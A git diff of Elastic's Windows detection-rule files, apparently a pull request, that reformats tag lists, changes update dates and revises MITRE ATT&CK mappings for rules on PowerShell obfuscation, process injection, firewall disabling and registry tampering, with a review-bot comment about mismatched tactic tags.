= "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml b/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml index 47250fb084a..8f1bd286cb1 100644 
--- a/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -100,7 +100,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" 
@@ -144,39 +151,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml b/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml index 145c241a756..c138be71ed7 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -82,7 +82,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -127,39 +134,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml b/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml index 768f4aeb483..4b1409da8c8 100644 
--- a/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/15" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -112,7 +112,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" 
@@ -154,39 +161,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml b/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml index 4bc50165fbf..9f3f14ce734 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -79,7 +79,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -140,39 +147,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", 
diff --git a/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml b/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml index 7f5472b2a96..68743a18154 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -95,7 +95,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" 
@@ -142,39 +149,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml b/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml index e3e40c756d6..7ee84b163a3 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -101,7 +101,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -156,39 +163,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml b/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml index 938cd397a2b..f876139f3e3 100644 
--- a/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -82,7 +82,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" 
@@ -137,44 +144,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" - [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml b/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml index 251ddd0e74c..c8686112bee 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -100,7 +100,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -146,39 +153,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml b/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml index 1886459dd34..ef57939e469 100644 
--- a/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -98,7 +98,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" 
@@ -145,39 +152,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_string_format.toml b/rules/windows/defense_evasion_posh_obfuscation_string_format.toml index 95a1b579929..c92ccaac12b 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_string_format.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_string_format.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/03" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -100,7 +100,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -167,39 +174,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", 
diff --git a/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml b/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml index 451282d8be6..eea41de377c 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -167,21 +167,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_process_injection.toml b/rules/windows/defense_evasion_posh_process_injection.toml index eb10b5a9081..26f4689951f 100644 
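Review bot: This file gains a second `[[rule.threat]]` entry for `TA0002` Execution (`T1059.001`), but unlike the other posh_obfuscation rules no `tags` hunk is present, so the tags line is unchanged; unless it already contains `"Tactic: Execution"` the new tactic will have no matching tag. The same applies to defense_evasion_reg_disable_enableglobalqueryblocklist.toml, which adds a `TA0006` Credential Access entry (`T1557`), and defense_evasion_right_to_left_override.toml, which adds `TA0002` Execution (`T1204.002`), neither of which touches `tags`. If the tag is absent in those files, add `"Tactic: Execution",` (respectively `"Tactic: Credential Access",`) to `tags` so the mapping and tags stay in step.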
--- a/rules/windows/defense_evasion_posh_process_injection.toml +++ b/rules/windows/defense_evasion_posh_process_injection.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -139,34 +139,49 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique.subtechnique]] +id = "T1055.001" +name = "Dynamic-link Library Injection" +reference = "https://attack.mitre.org/techniques/T1055/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1055.002" +name = "Portable Executable Injection" +reference = "https://attack.mitre.org/techniques/T1055/002/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique]] +id = "T1106" +name = "Native API" +reference = "https://attack.mitre.org/techniques/T1106/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml b/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml index e8dd124e358..772ec9c6030 100644 --- a/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml +++ b/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/12" [rule] author = ["Austin Songer"] @@ -74,7 +74,21 @@ references = [ risk_score = 47 rule_id = "f63c8e3c-d396-404f-b2ea-0379d3942d73" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" 
@@ -92,18 +106,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.004" name = "Disable or Modify System Firewall" reference = "https://attack.mitre.org/techniques/T1562/004/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml b/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml index 3601255196c..d3516cd5119 100644 --- a/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml +++ b/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/07" [rule] author = ["Elastic"] 
@@ -94,23 +94,31 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/defense_evasion_regmod_remotemonologue.toml b/rules/windows/defense_evasion_regmod_remotemonologue.toml index 38470bfed72..7aba4b1f611 100644 --- a/rules/windows/defense_evasion_regmod_remotemonologue.toml +++ b/rules/windows/defense_evasion_regmod_remotemonologue.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/18" [rule] author = ["Elastic"] 
